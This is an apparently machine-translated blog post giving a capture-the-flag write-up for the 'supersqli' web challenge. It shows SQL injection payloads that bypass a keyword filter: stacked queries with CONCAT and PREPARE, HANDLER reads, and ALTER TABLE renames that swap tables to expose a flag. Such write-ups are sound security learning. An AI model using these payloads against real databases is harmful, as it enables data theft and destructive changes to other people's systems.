当前位置:网站首页>Attack and defense world (WEB) -- supersqli
Attack and defense world (WEB) -- supersqli
2022-06-12 18:55:00 【Xiao Xiaoran】
List of articles
Attack and defend the world (web piece )—supersqli
After getting the title , It is found that it is a single quotation mark error character injection

order by 2 The page will echo normally ,order by 3 Page error during

Next union Inquire about , It is found that many statements are filtered

Bypass the filter , There are several ways
Stack query + precompile
Look up the table

Check field

Use precompiled method to check , But filtered

strstr Case sensitive
?inject=1';set @sql = CONCAT('sele','ct * from `1919810931114514`;');Prepare xiao from @sql;EXECUTE xiao;

handler Inquire about
handler grammar


Inquire about payload
?inject=1';handler `1919810931114514` open;handler `1919810931114514` read first; --+

Stack query + Change the name of the watch
Principle analysis
At the beginning, it is to query word Table data , So we can use the database to modify the table name and column name
First put the original words Change the name of the watch to something else , then 1919810931114514 Change the name of the table to words
Then change the name of the table after the flag Change the field to id (id Also need to show columns from word obtain )
And then we use 1’ or 1=1 --+ You can get it directly flag
modify payload
?inject=1';alter table words rename to aaaa;alter table `1919810931114514` rename to words;alter table words change flag id varchar(100);











边栏推荐
- Kali implements port forwarding through iptables
- What is a network proxy
- 美团获得小样本学习榜单FewCLUE第一!Prompt Learning+自训练实战
- Design of smart home control system (onenet) based on stm32_ two thousand and twenty-two
- CVPR 2022 oral Dalian Institute of technology proposed SCI: a fast and powerful low light image enhancement method
- 攻防世界(web篇)---supersqli
- Cookie & Session & kaptcha验证码
- Leetcode topic [string]-541- reverse string II
- SCI Writing - Results
- Leetcode 1049. Weight of the last stone II
猜你喜欢

leetcode:6096. 咒语和药水的成功对数【排序 + 二分】

The Bean Validation API is on the classpath but no implementation could be found

【矩阵论 & 图论】期末考试复习思维导图

no available service ‘null‘ found, please make sure registry config correct

超级重磅!Apache Hudi多模索引对查询优化高达30倍
![leetcode:6096. Success logarithm of spells and potions [sort + dichotomy]](/img/af/0d6ea1a25e65962616b2b049711510.png)
leetcode:6096. Success logarithm of spells and potions [sort + dichotomy]

Common methods and examples of defect detection based on Halcon

kali局域网ARP欺骗(arpspoof)并监听(mitmproxy)局域内其它主机上网记录

Liunx deploy Seata (Nacos version)

【历史上的今天】6 月 12 日:美国进入数字化电视时代;Mozilla 的最初开发者出生;3Com 和美国机器人公司合并
随机推荐
Hash hash
leetcode:5270. 网格中的最小路径代价【简单层次dp】
Leetcode 416. 分割等和子集
美团智能配送系统的运筹优化实战-笔记
leetcode:98. Count the number of subarrays whose score is less than k [double pointers + number of calculated subsets + de duplication]
Common troubleshooting tools and analysis artifacts are worth collecting
YOLOX网络结构详解
How to download proxystrike in China
一种灵活注入 Istio Sidecar 的方案探索
基于Halcon的螺栓螺丝部分划痕、腐蚀缺陷检测
kali2022如何安装w3af
leetcode:6094. Company name [group enumeration + cannot repeat set intersection + product Cartesian product (repeat indicates length)]
Wireshark basic commands
leetcode:6095. 强密码检验器 II【简单模拟 + 不符合直接False】
A story on the cloud of the Centennial Olympic Games belonging to Alibaba cloud video cloud
【矩阵论 & 图论】期末考试复习思维导图
Free measurement of rectangular card [manual drawing ROI] Based on Halcon
What is SAP support package stack
美团获得小样本学习榜单FewCLUE第一!Prompt Learning+自训练实战
Use of nexttick function